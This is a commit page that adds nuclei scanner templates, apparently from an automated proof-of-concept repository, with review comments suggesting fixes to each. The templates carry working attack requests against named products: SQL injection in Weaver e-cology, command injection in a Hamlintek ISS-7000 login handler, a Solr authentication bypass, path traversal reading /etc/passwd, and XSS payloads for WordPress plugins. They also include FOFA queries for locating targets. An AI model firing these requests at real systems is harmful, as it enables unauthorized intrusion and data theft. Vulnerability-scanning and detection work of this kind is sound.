
20241214
actions-user committed Dec 14, 2024
1 parent 25c05df commit 62bad0f
Showing 361 changed files with 19,718 additions and 1 deletion.
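--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20241213
+20241214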
359 changes: 359 additions & 0 deletions poc.txt


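--- a/poc/auth/fanwei-Ecology-LoginSSO-sqli.yaml
+++ b/poc/auth/fanwei-Ecology-LoginSSO-sqli.yaml
@@ -0,0 +1,29 @@
+id: fanwei-Ecology-LoginSSO-sqli
+
+info:
+name: fanwei-Ecology-LoginSSO-sqli
+author: PokerSec
+severity: high
+metadata:
+fofasearch: app="泛微-OA(e-cology)"
+
+requests:
+- raw:
+- |+
+GET /weaver/FileDownloadLocation/login/LoginSSO.%2520jsp?ddcode=7ea7ef3c41d67297&mrfuuid=1%27;if+db_name(1)=%27master%27+WAITFOR+delay+%270:0:3%27--+&mailid=0&a=.swf HTTP/1.1
+Host: {{Hostname}}
+Connection: close
+Accept-Encoding: gzip, deflate
+matchers:
+- type: dsl
+condition: and
+dsl:
+- duration > 3 && duration < 6 && status_code==302
+
+
+
+extractors:
+- type: dsl
+dsl:
+- duration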
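Review bot: The time-based matcher at L46 (`duration > 3 && duration < 6 && status_code==302`) has no baseline, so any target that simply takes three to six seconds to answer this endpoint is reported as SQL-injectable; the WAITFOR delay should be measured against a control request. Send the same request with `mrfuuid=1` and no injected delay as a second raw request, set `req-condition: true`, and match on `duration_1 - duration_2 >= 3 && status_code_1 == 302` (this assumes the un-injected request also answers 302 quickly — confirm on a known instance). The block also uses the deprecated top-level `requests:` key while the other templates in this commit use `http:`, and the info block has no `description` or `tags`; a one-liner such as `description: Blind, time-based SQL injection in the mrfuuid parameter of LoginSSO.jsp (MSSQL WAITFOR).` records what the matcher is actually proving.
```yaml
http:
  - raw:
      # … unchanged: the WAITFOR-delay request above …
      - |+
        GET /weaver/FileDownloadLocation/login/LoginSSO.%2520jsp?ddcode=7ea7ef3c41d67297&mrfuuid=1&mailid=0&a=.swf HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept-Encoding: gzip, deflate

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "duration_1 - duration_2 >= 3 && status_code_1 == 302"
```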
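--- a/poc/auth/hamlintek-ISS-7000-login_handler-rce.yaml
+++ b/poc/auth/hamlintek-ISS-7000-login_handler-rce.yaml
@@ -0,0 +1,22 @@
+id: hamlintek-ISS-7000-login_handler-rce
+
+info:
+name: hamlintek-ISS-7000-login_handler-rce
+author: PokerSec
+severity: critical
+metadata:
+fofasearch: body="css/login_form_style-06.css"
+
+http:
+- raw:
+- |
+POST /login_handler.cgi HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded
+username=admin&password=admin;id;&uilng=3&button=%E7%99%BB%E5%85%A5&Signin=
+matchers:
+- type: dsl
+dsl:
+- status_code==200 && contains_all(body,"uid=0") && contains_all(body,"gid=0") && contains_all(header,"ISS-7000 v2")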
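Review bot: As rendered, the raw POST at L69–L72 goes straight from `Content-Type` to the form body with no empty line between them; nuclei's raw request format needs that blank line, otherwise `username=admin&password=admin;id;...` is sent as a malformed header and the injection never reaches `login_handler.cgi`. The section reports 22 additions but only 20 lines are shown, so the page may have dropped it — confirm against the file. The info block has no description, reference or tags: add `description: Pre-authentication OS command injection through the password field of login_handler.cgi; the probe appends ;id; and expects uid=0/gid=0 in the response.` and `tags: hamlintek,iss-7000,rce,cmdi` so the finding is self-explanatory. The DSL at L76 can also collapse its two single-argument calls into `contains_all(body,"uid=0","gid=0")`.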
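--- a/poc/auth/ider-login-77ccffccfac1bb6eac46823913cc705c.yaml
+++ b/poc/auth/ider-login-77ccffccfac1bb6eac46823913cc705c.yaml
@@ -0,0 +1,59 @@
+id: ider-login-77ccffccfac1bb6eac46823913cc705c
+
+info:
+name: >
+IDer Login for WordPress <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+author: topscoder
+severity: low
+description: >
+reference:
+- https://github.com/topscoder/nuclei-wordfence-cve
+- https://www.wordfence.com/threat-intel/vulnerabilities/id/de602cf8-cc02-4459-aa23-5d8236048bca?source=api-scan
+classification:
+cvss-metrics:
+cvss-score:
+cve-id:
+metadata:
+fofa-query: "wp-content/plugins/ider-login/"
+google-query: inurl:"/wp-content/plugins/ider-login/"
+shodan-query: 'vuln:'
+tags: cve,wordpress,wp-plugin,ider-login,low
+
+http:
+- method: GET
+redirects: true
+max-redirects: 3
+path:
+- "{{BaseURL}}/wp-content/plugins/ider-login/readme.txt"
+
+extractors:
+- type: regex
+name: version
+part: body
+group: 1
+internal: true
+regex:
+- "(?mi)Stable tag: ([0-9.]+)"
+
+- type: regex
+name: version
+part: body
+group: 1
+regex:
+- "(?mi)Stable tag: ([0-9.]+)"
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+
+- type: word
+words:
+- "ider-login"
+part: body
+
+- type: dsl
+dsl:
+- compare_versions(version, '<= 2.1')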
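Review bot: The classification block at L91–L94 leaves `cvss-metrics`, `cvss-score` and `cve-id` as bare keys (null in YAML) and `description: >` at L87 is an empty folded scalar, yet `tags` at L99 advertises `cve`; anyone running `-tags cve` picks up a template that carries no CVE at all. Either populate these fields from the Wordfence advisory referenced at L90 or drop the `cve` tag, and remove the placeholder `shodan-query: 'vuln:'` at L98. The description should also say that this is a version fingerprint — it reads `Stable tag` from readme.txt and fires on `<= 2.1` via the DSL at L137 — rather than a check of the stored XSS itself, e.g. `description: Version check only — reports installs whose readme.txt Stable tag is <= 2.1; exploitability of the Contributor+ stored XSS is not verified.`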
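--- a/poc/auth/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml
+++ b/poc/auth/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml
@@ -0,0 +1,20 @@
+id: mingyuanyun_ERP_GetErpConfig_unauthorized
+
+info:
+name: mingyuanyun_ERP_GetErpConfig_unauthorized
+author: PokerSec
+severity: high
+metadata:
+fofasearch: body="报表服务已正常运行"
+
+
+http:
+- raw:
+- |
+GET /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 HTTP/1.1
+Host: {{Hostname}}
+matchers:
+- type: dsl
+dsl:
+- status_code==200 && contains_all(body,"AdminUserCode") && contains_all(body,"ErpKey")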
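Review bot: The DSL matcher at L159 calls `contains_all` twice with a single string each; the function is variadic, so `status_code==200 && contains_all(body,"AdminUserCode","ErpKey")` states the same "all of these" condition in one call and reads as such. The template has no description, reference or tags — the request carries no credentials, so `description: Unauthenticated request to GetErpConfig.aspx returns the ERP configuration, including an AdminUserCode entry.` is as far as the visible matcher strings justify going; add `tags: mingyuanyun,erp,unauth,disclosure` alongside. The hard-coded `erpKey=erp60` at L154 deserves a comment on whether it is the default key or one specific to the instance the PoC was written against.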
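--- a/poc/auth/solr-PKIAuthenticationPlugin-admin-bypass.yaml
+++ b/poc/auth/solr-PKIAuthenticationPlugin-admin-bypass.yaml
@@ -0,0 +1,21 @@
+id: solr-PKIAuthenticationPlugin-admin-bypass
+
+info:
+name: solr-PKIAuthenticationPlugin-admin-bypass
+author: PokerSec
+severity: high
+metadata:
+fofasearch: app="APACHE-Solr"
+
+requests:
+- raw:
+- |+
+GET /solr/admin/info/properties:/admin/info/key HTTP/1.1
+Host: {{Hostname}}
+SolrAuth: XXXXX
+matchers:
+- type: dsl
+dsl:
+- status_code==200 && contains_all(body,"system.properties") && contains_all(body,"Eclipse Adoptium")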
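Review bot: The matcher at L181 requires `Eclipse Adoptium` in the body, which fingerprints the JVM vendor in the returned system properties rather than the bypass itself; a Solr instance on any other JDK build yields a false negative even though `/admin/info/properties` was served without valid auth. Match on the properties response alone, e.g. `- status_code==200 && contains_all(body,"system.properties","java.version")` (`java.version` is a standard JVM property — confirm it appears in the JSON). The template also uses the deprecated `requests:` key while the rest of this commit uses `http:`, and the `SolrAuth: XXXXX` header at L177 should carry a comment saying the value is intentionally bogus (presumably the point is that an arbitrary PKI header is accepted) so a later editor does not "fix" it.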
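--- a/poc/auth/yongyou-BIP-yonbiplogin-fileread.yaml
+++ b/poc/auth/yongyou-BIP-yonbiplogin-fileread.yaml
@@ -0,0 +1,19 @@
+id: yongyou-BIP-nginx-lua-fileread
+
+info:
+name: yongyou-BIP-nginx-lua-fileread
+author: PokerSec
+severity: critical
+metadata:
+fofasearch: "iuap-apcom-workbench/"
+
+http:
+- raw:
+- |
+GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg.js HTTP/1.1
+Host: {{Hostname}}
+matchers:
+- type: dsl
+dsl:
+- contains_all(body,"root:x") && status_code==200 && contains_all(body,"daemon:x") && contains_all(body,"Password","ArrayOfOlapConnection")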
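Review bot: The matcher at L202 can never fire on a successful read: besides `root:x` and `daemon:x` it also requires `Password` and `ArrayOfOlapConnection` in the body, strings that do not occur in `/etc/passwd` and look copied from a different template's OLAP-connection check. Drop that clause: `- status_code==200 && contains_all(body,"root:x","daemon:x")`. Separately, the `id` at L185 (`yongyou-BIP-nginx-lua-fileread`) does not match the file name `yongyou-BIP-yonbiplogin-fileread.yaml`; pick one so `-id` filtering and the path agree. A `description` recording the encoding the target needs — double-encoded `..%252F` traversal plus a null-byte-terminated `.jpg.js` suffix — would keep the otherwise opaque request line understandable.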
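--- a/poc/backup/indeed-wp-superbackup.yaml
+++ b/poc/backup/indeed-wp-superbackup.yaml
@@ -0,0 +1,59 @@
+id: indeed-wp-superbackup-617a1d8a65bee9cf7b98f71587d5bbf1
+
+info:
+name: >
+Super Backup & Clone - Migrate for WordPress <= 2.3.3 - Unauthenticated Arbitrary File Upload
+author: topscoder
+severity: critical
+description: >
+reference:
+- https://github.com/topscoder/nuclei-wordfence-cve
+- https://www.wordfence.com/threat-intel/vulnerabilities/id/7c31d9b3-38b1-49a1-b361-ffe97e02bff0?source=api-scan
+classification:
+cvss-metrics:
+cvss-score:
+cve-id:
+metadata:
+fofa-query: "wp-content/plugins/indeed-wp-superbackup/"
+google-query: inurl:"/wp-content/plugins/indeed-wp-superbackup/"
+shodan-query: 'vuln:'
+tags: cve,wordpress,wp-plugin,indeed-wp-superbackup,critical
+
+http:
+- method: GET
+redirects: true
+max-redirects: 3
+path:
+- "{{BaseURL}}/wp-content/plugins/indeed-wp-superbackup/readme.txt"
+
+extractors:
+- type: regex
+name: version
+part: body
+group: 1
+internal: true
+regex:
+- "(?mi)Stable tag: ([0-9.]+)"
+
+- type: regex
+name: version
+part: body
+group: 1
+regex:
+- "(?mi)Stable tag: ([0-9.]+)"
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+
+- type: word
+words:
+- "indeed-wp-superbackup"
+part: body
+
+- type: dsl
+dsl:
+- compare_versions(version, '<= 2.3.3')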
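Review bot: A `critical` result from this template rests solely on the `Stable tag` regex at L241/L248 against readme.txt, so `compare_versions(version, '<= 2.3.3')` at L263 flags any install whose readme reports 2.3.3 or lower without ever touching the upload path; the empty `description: >` at L213 should say so, e.g. `description: Version-based detection of the unauthenticated arbitrary file upload (readme.txt Stable tag <= 2.3.3); exploitability is not verified.` The classification keys at L218–L220 are null and `shodan-query: 'vuln:'` at L224 is filler — fill `cve-id`/`cvss-score` from the Wordfence entry at L216 or drop the `cve` tag at L225. The two `version` extractors at L235–L248 differ only in `internal: true`; if the second exists purely to surface the version in output, a comment saying so stops it being removed as a copy-paste.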
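--- a/poc/cnvd/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml
+++ b/poc/cnvd/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml
@@ -0,0 +1,28 @@
+id: fanwei-Ecology-browser-sqli
+
+info:
+name: fanwei-Ecology-browser-sqli
+author: PokerSec
+severity: high
+metadata:
+fofasearch: app="泛微-OA(e-cology)"
+
+requests:
+- raw:
+- |-
+POST /mobile/%20/plugin/browser.jsp HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded
+isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%32%25%33%37%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%39%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- countSql
+- baseSql
+- type: status
+status:
+- 200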
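Review bot: The word matcher at L286–L290 lists `countSql` and `baseSql` with no `condition`, so nuclei's default `or` applies and either string alone — say `baseSql` in an unrelated stack trace — satisfies it; add `condition: and` under the matcher so both must appear. The id at L267 and the info block omit the identifier the file name carries, CNVD-2023-12632: add `tags: fanwei,ecology,sqli,cnvd,cnvd2023` and a `reference:` to the advisory so the finding can be traced. This block also uses the deprecated `requests:` key (the other new templates use `http:`), and as rendered the POST at L279–L282 shows no blank line between `Content-Type` and the body — confirm the file has one, since nuclei raw requests need it and the page appears to have dropped lines (28 additions reported, fewer shown).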
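--- a/poc/config/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml
+++ b/poc/config/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml
@@ -0,0 +1,20 @@
+id: mingyuanyun_ERP_GetErpConfig_unauthorized
+
+info:
+name: mingyuanyun_ERP_GetErpConfig_unauthorized
+author: PokerSec
+severity: high
+metadata:
+fofasearch: body="报表服务已正常运行"
+
+
+http:
+- raw:
+- |
+GET /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 HTTP/1.1
+Host: {{Hostname}}
+matchers:
+- type: dsl
+dsl:
+- status_code==200 && contains_all(body,"AdminUserCode") && contains_all(body,"ErpKey")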
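Review bot: This file is, as rendered, identical to the one added at `poc/auth/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml` earlier in this commit (L138–L159), and both declare `id: mingyuanyun_ERP_GetErpConfig_unauthorized`; nuclei treats the template id as unique and, as far as I recall, warns about the duplicate and loads only one of them when both directories are in the template path. Keep a single copy, or if the `auth`/`config` split is deliberate, give this one a distinct id and a comment pointing at the other. Whichever copy stays, the matcher at L315 collapses to `status_code==200 && contains_all(body,"AdminUserCode","ErpKey")`.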
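--- a/poc/cve/CVE-2011-5107-2102.yaml
+++ b/poc/cve/CVE-2011-5107-2102.yaml
@@ -0,0 +1,29 @@
+id: CVE-2011-5107
+info:
+name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting
+author: daffainfo
+severity: medium
+description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.
+reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107 https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/
+tags: cve,cve2011,wordpress,xss,wp-plugin
+classification:
+cve-id: CVE-2011-5107
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "</script><script>alert(document.domain)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200
+
+# Enhanced by mp on 2022/02/21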
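Review bot: `reference:` at L325 is a single scalar holding two URLs separated by a space; nuclei accepts a string there, but it then becomes one reference containing two URLs, and anything that iterates references gets a single malformed entry. Write it as a list like the other templates in this commit: `reference:` followed by `- https://nvd.nist.gov/vuln/detail/CVE-2011-5107` and `- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/`. The block also uses the deprecated `requests:` key, and the `/trunk/` segment in the path at L332 (presumably the SVN layout the plugin shipped in, not where WordPress installs it) deserves a one-line comment if it is intentional.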
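--- a/poc/cve/CVE-2014-4536-2354.yaml
+++ b/poc/cve/CVE-2014-4536-2354.yaml
@@ -0,0 +1,41 @@
+id: CVE-2014-4536
+
+info:
+name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting
+author: daffainfo
+severity: medium
+description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.
+reference:
+- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
+- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
+- http://wordpress.org/plugins/infusionsoft/changelog
+- http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.1
+cve-id: CVE-2014-4536
+cwe-id: CWE-79
+tags: cve,cve2014,wordpress,wp-plugin,xss
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- '"></script><script>alert(document.domain)</script>'
+part: body
+
+- type: word
+part: header
+words:
+- text/html
+
+- type: status
+status:
+- 200
+
+# Enhanced by mp on 2022/02/24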
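Review bot: The word matcher at L379 looks for `"></script><script>alert(document.domain)</script>`, but none of the three injected values in the path at L373 decodes to that string: `contactId` carries `'></script><script>alert(document.domain)</script>` (single quote), while `go` and `campaignId` carry `"><script>alert(document.cookie)</script>` with no leading `</script>`. Unless the application rewrites quotes, a verbatim reflection never matches and the template reports nothing; align the matcher with the `contactId` payload, `- "'></script><script>alert(document.domain)</script>"`, or change the payload to match. Also, the name at L354 says `< 1.5.7` while the description at L357 says `before 1.5.6`; settle the fixed version from the changelog reference at L361 and use it in both.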
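--- a/poc/cve/CVE-2014-9094-2422.yaml
+++ b/poc/cve/CVE-2014-9094-2422.yaml
@@ -0,0 +1,29 @@
+id: CVE-2014-9094
+
+info:
+name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
+author: daffainfo
+severity: medium
+description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
+reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
+tags: cve,cve2014,wordpress,xss,wp-plugin
+
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(1)</script>"
+
+- type: word
+part: header
+words:
+- text/html
+
+- type: status
+status:
+- 200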
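Review bot: The body matcher at L414 (`<script>alert(1)</script>`) omits the `">` attribute break-out that the payload at L408 injects, so it is a weaker proof of the reflection than the full sequence, and `alert(1)` is a generic string that also turns up in WAF block pages and honeypots. Match the whole reflected payload, `- '"><script>alert(document.domain)</script>'`, with the path changed to `swfloc=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E`, which also follows the `document.domain` convention the other CVE templates in this commit use. A `classification:` block with `cve-id: CVE-2014-9094` and `cwe-id: CWE-79`, as CVE-2014-4536 has at L363–L367, would bring the metadata in line, and `requests:` should become `http:`.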